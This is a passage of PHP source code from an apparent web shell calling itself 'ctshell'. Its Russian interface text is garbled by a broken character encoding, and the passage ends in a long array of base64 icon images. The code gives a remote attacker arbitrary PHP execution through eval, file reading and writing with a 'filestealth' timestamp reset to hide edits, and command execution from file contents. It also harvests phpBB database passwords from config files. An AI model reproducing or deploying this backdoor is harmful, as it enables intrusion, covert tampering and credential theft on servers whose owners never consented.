  1798. foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
  1799. echo "</tr>";
  1800. foreach ($prcs as $line)
  1801. {
  1802.  if (!empty($line))
  1803.  {
  1804.   echo "<tr>";
  1805.   $line = explode(" ",$line);
  1806.   $line[10] = join(" ",array_slice($line,10,count($line)));
  1807.   $line = array_slice($line,0,11);
  1808.   $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  1809.   foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
  1810.   echo "</tr>";
  1811.  }
  1812. }
  1813. echo "</table>";
  1814.   }
  1815.  }
  1816. }
  1817. if ($act == "eval")
  1818. {
  1819.  if (!empty($eval))
  1820.  {
  1821.   echo "<b>��������� ���������� ���� PHP-���</b>:<br>";
  1822.   $tmp = ob_get_contents();
  1823.   $olddir = realpath(".");
  1824.   @chdir($d);
  1825.   if ($tmp)
  1826.   {
  1827. ob_clean();
  1828. eval($eval);
  1829. $ret = ob_get_contents();
  1830. $ret = convert_cyr_string($ret,"d","w");
  1831. ob_clean();
  1832. echo $tmp;
  1833. if ($eval_txt)
  1834. {
  1835.  $rows = count(explode("
  1836. ",$ret))+1;
  1837.  if ($rows < 10) {$rows = 10;}
  1838.  echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1839. }
  1840. else {echo $ret;}
  1841.   }
  1842.   else
  1843.   {
  1844. if ($eval_txt)
  1845. {
  1846.  echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  1847.  eval($eval);
  1848.  echo "</textarea>";
  1849. }
  1850. else {echo $ret;}
  1851.   }
  1852.   @chdir($olddir);
  1853.  }
  1854.  else {echo "<b>PHP-��� ����������</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
  1855.  echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"���������\"></form>";
  1856. }
  1857. if ($act == "f")
  1858. {
  1859.  $r = @file_get_contents($d.$f);
  1860.  if (!is_readable($d.$f) and $ft != "edit")
  1861.  {
  1862.   if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  1863.   else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  1864.  }
  1865.  else
  1866.  {
  1867.   $ext = explode(".",$f);
  1868.   $c = count($ext)-1;
  1869.   $ext = $ext[$c];
  1870.   $ext = strtolower($ext);
  1871.   $rft = "";
  1872.   foreach($ftypes as $k=>$v)
  1873.   {
  1874. if (in_array($ext,$v)) {$rft = $k; break;}
  1875.   }
  1876.   if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  1877.   if (empty($ft)) {$ft = $rft;}
  1878.  
  1879.   echo "<b>������������ �����:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1880.   if (is_writable($d.$f)) {echo "<font color=\"green\">������ ������ ������/������ (".view_perms(fileperms($d.$f)).")</font>";}
  1881.   else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
  1882.  
  1883.   echo "<hr size=\"1\" noshade>";
  1884.   if ($ft == "info")
  1885.   {
  1886. echo "<b>Information:</b>";
  1887. echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
  1888. echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
  1889. echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  1890. if (!$win)
  1891. {
  1892.  echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
  1893.  $tmp=posix_getpwuid(fileowner($d.$f));
  1894.  if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
  1895.  else echo $tmp['name']." ";
  1896.  $tmp=posix_getgrgid(filegroup($d.$f));
  1897.  if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
  1898.  else echo $tmp['name'];
  1899. }
  1900. echo "<tr class=tr><td><b>Perms</b></td><td>";
  1901.  
  1902. if (is_writable($d.$f))
  1903. {
  1904.  echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
  1905. }
  1906. else
  1907. {
  1908.  echo "<font>".view_perms(fileperms($d.$f))."</font>";
  1909. }
  1910.  
  1911. echo "</td></tr>";
  1912. echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
  1913. echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
  1914. echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
  1915. echo "</table><br>";
  1916.  
  1917.  
  1918. $fi = fopen($d.$f,"rb");
  1919. if ($fi)
  1920. {
  1921.  if ($fullhexdump)
  1922.  {
  1923.   echo "<b>FULL HEXDUMP</b>";
  1924.   $str=fread($fi,filesize($d.$f));
  1925.  }
  1926.  else
  1927.  {
  1928.   echo "<b>HEXDUMP PREVIEW</b>";
  1929.   $str=fread($fi,$hexdump_lines*$hexdump_rows);
  1930.  }
  1931.  $n=0;
  1932.  $a0="00000000<br>";
  1933.  $a1="";
  1934.  $a2="";
  1935.  for ($i=0; $i<strlen($str); $i++)
  1936.  {
  1937.   $a1.=sprintf("%02X",ord($str[$i])).' ';
  1938.   switch (ord($str[$i]))
  1939.   {
  1940. case 0:  $a2.="<font class=s2>0</font>"; break;
  1941. case 32:
  1942. case 10:
  1943. case 13: $a2.="&nbsp;"; break;
  1944. default:  $a2.=htmlspecialchars($str[$i]);
  1945.   }
  1946.   $n++;
  1947.   if ($n == $hexdump_rows)
  1948.   {
  1949. $n = 0;
  1950. if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
  1951. $a1.="<br>";
  1952. $a2.="<br>";
  1953.   }
  1954.  }
  1955.  echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
  1956. "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
  1957. "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
  1958. }
  1959. $encoded = "";
  1960. if ($base64 == 1)
  1961. {
  1962.  echo "<b>Base64 Encode</b><br>";
  1963.  $encoded = base64_encode($r);
  1964. }
  1965. elseif($base64 == 2)
  1966. {
  1967.  echo "<b>Base64 Encode + Chunk</b><br>";
  1968.  $encoded = chunk_split(base64_encode($r));
  1969. }
  1970. elseif($base64 == 3)
  1971. {
  1972.  echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  1973.  $encoded = base64_encode($r);
  1974.  $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  1975. }
  1976. elseif($base64 == 4)
  1977. {
  1978. }
  1979. if (!empty($encoded))
  1980. {
  1981.  echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  1982. }
  1983. echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  1984. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  1985. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  1986. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  1987. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  1988. <P>";
  1989.   }
  1990.   elseif ($ft == "html")
  1991.   {
  1992. if ($white) {@ob_clean();}
  1993. echo $r;
  1994. if ($white) {exit;}
  1995.   }
  1996.   elseif ($ft == "txt")
  1997.   {
  1998. echo "<pre>".htmlspecialchars($r)."</pre>";
  1999.   }
  2000.   elseif ($ft == "ini")
  2001.   {
  2002. echo "<pre>";
  2003. var_dump(parse_ini_file($d.$f,true));
  2004. echo "</pre>";
  2005.   }
  2006.   elseif ($ft == "phpsess")
  2007.   {
  2008. echo "<pre>";
  2009. $v = explode("|",$r);
  2010. echo $v[0]."<br>";
  2011. var_dump(unserialize($v[1]));
  2012. echo "</pre>";
  2013.   }
  2014.   elseif ($ft == "exe")
  2015.   {
  2016. echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
  2017.   }
  2018.   elseif ($ft == "sdb")
  2019.   {
  2020. echo "<pre>";
  2021. var_dump(unserialize(base64_decode($r)));
  2022. echo "</pre>";
  2023.   }
  2024.   elseif ($ft == "code")
  2025.   {
  2026. if (ereg("phpBB 2.(.*) auto-generated config file",$r))
  2027. {
  2028.  $arr = explode("
  2029. ",$r);
  2030.  if (count($arr == 18))
  2031.  {
  2032.   include($d.$f);
  2033.   echo "<b>phpBB configuration is detected in this file!<br>";
  2034.   if ($dbms == "mysql4") {$dbms = "mysql";}
  2035.   if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  2036.   else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
  2037.   echo "Parameters for manual connect:<br>";
  2038.   $cfgvars = array(
  2039.   "dbms"=>$dbms,
  2040.   "dbhost"=>$dbhost,
  2041.   "dbname"=>$dbname,
  2042.   "dbuser"=>$dbuser,
  2043.   "dbpasswd"=>$dbpasswd
  2044.   );
  2045.   foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2046.  
  2047.   echo "</b>";
  2048.   echo "<hr size=\"1\" noshade>";
  2049.  }
  2050. }
  2051. echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
  2052. if (!empty($white)) {@ob_clean();}
  2053. if ($rehtml) {$r = rehtmlspecialchars($r);}
  2054. $r = stripslashes($r);
  2055. $strip = false;
  2056. if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
  2057. $r = @highlight_string($r, TRUE);
  2058. if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
  2059. echo $r;
  2060. if (!empty($white)) {exit;}
  2061. echo "</div>";
  2062.   }
  2063.   elseif ($ft == "download")
  2064.   {
  2065. @ob_clean();
  2066. header("Content-type: ctshell");
  2067. header("Content-disposition: attachment; filename=\"".$f."\";");
  2068. echo($r);
  2069. exit;
  2070.   }
  2071.   elseif ($ft == "notepad")
  2072.   {
  2073. @ob_clean();
  2074. header("Content-type: text/plain");
  2075. header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2076. echo($r);
  2077. exit;
  2078.   }
  2079.   elseif ($ft == "img")
  2080.   {
  2081. if (!$white)
  2082. {
  2083.  echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
  2084. }
  2085. else
  2086. {
  2087.  @ob_clean();
  2088.  $ext = explode($f,".");
  2089.  $ext = $ext[count($ext)-1];
  2090.  header("Content-type: image/gif");
  2091.  echo($r);
  2092.  exit;
  2093. }
  2094.   }
  2095.   elseif ($ft == "edit")
  2096.   {
  2097. if (!empty($submit))
  2098. {
  2099.  if ($filestealth) {$stat = stat($d.$f);}
  2100.  if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
  2101.  $fp = fopen($d.$f,"w");
  2102.  if (!$fp) {echo "<b>Can't write to file!</b>";}
  2103.  else
  2104.  {
  2105.   echo "<b>���������!!!</b>";
  2106.   fwrite($fp,$nfcontent);
  2107.   fclose($fp);
  2108.   if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2109.   $r = $nfcontent;
  2110.  }
  2111. }
  2112. $rows = count(explode("
  2113. ",$r));
  2114. if ($rows < 10) {$rows = 10;}
  2115. if ($rows > 30) {$rows = 30;}
  2116. echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"���������\">&nbsp;<input type=\"reset\" value=\"�����\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2117.   }
  2118.   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2119.   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2120.  }
  2121. }
  2122. if ($act == "phpinfo")
  2123. {
  2124.  ob_end_clean();
  2125.  phpinfo();
  2126.  exit;
  2127. }
  2128. }
  2129. $data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
  2130. if ($act == "img")
  2131. {
  2132.  @ob_clean();
  2133.  
  2134.  $arrimg = array(
  2135. "arrow_ltr"=>
  2136. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
  2137. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  2138. "back"=>
  2139. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2140. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  2141. "Wg0JADs=",
  2142. "buffer"=>
  2143. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  2144. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
  2145. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  2146. "change"=>
  2147. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  2148. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  2149. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  2150. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  2151. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  2152. "zMshADs=",
  2153. "delete"=>
  2154. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
  2155. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
  2156. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
  2157. "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
  2158. "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
  2159. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2160. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  2161. "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
  2162. "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
  2163. "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
  2164. "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
  2165. "download"=>
  2166. "R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe".
  2167. "Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9".
  2168. "W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7",
  2169. "edit"=>
  2170. "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
  2171. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
  2172. "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
  2173. "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
  2174. "forward"=>
  2175. "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2176. "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
  2177. "WqsJADs=",
  2178. "home"=>
  2179. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
  2180. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
  2181. "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
  2182. "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
  2183. "mode"=>
  2184. "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
  2185. "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
  2186. "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
  2187. "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
  2188. "refresh"=>
  2189. "R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
  2190. "AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
  2191. "3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
  2192. "R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
  2193. "search"=>
  2194. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
  2195. "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
  2196. "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
  2197. "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
  2198. "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
  2199. "setup"=>
  2200. "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
  2201. "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2202. "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
  2203. "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
  2204. "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
  2205. "small_dir"=>
  2206. "R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m".
  2207. "f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q".
  2208. "gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=",
  2209. "small_unk"=>
  2210. "R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM".
  2211. "2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA".
  2212. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2213. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw".
  2214. "SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk".
  2215. "QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0".
  2216. "oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==",
  2217. "sort_asc"=>
  2218. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
  2219. "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
  2220. "sort_desc"=>
  2221. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
  2222. "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
  2223. "sql_button_drop"=>
  2224. "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2225. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2226. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2227. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2228. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2229. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2230. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2231. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2232. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2233. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2234. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2235. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2236. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2237. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
  2238. "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
  2239. "AQEAOw==",
  2240. "sql_button_empty"=>
  2241. "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2242. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2243. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2244. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2245. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2246. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2247. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2248. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2249. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2250. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2251. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2252. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
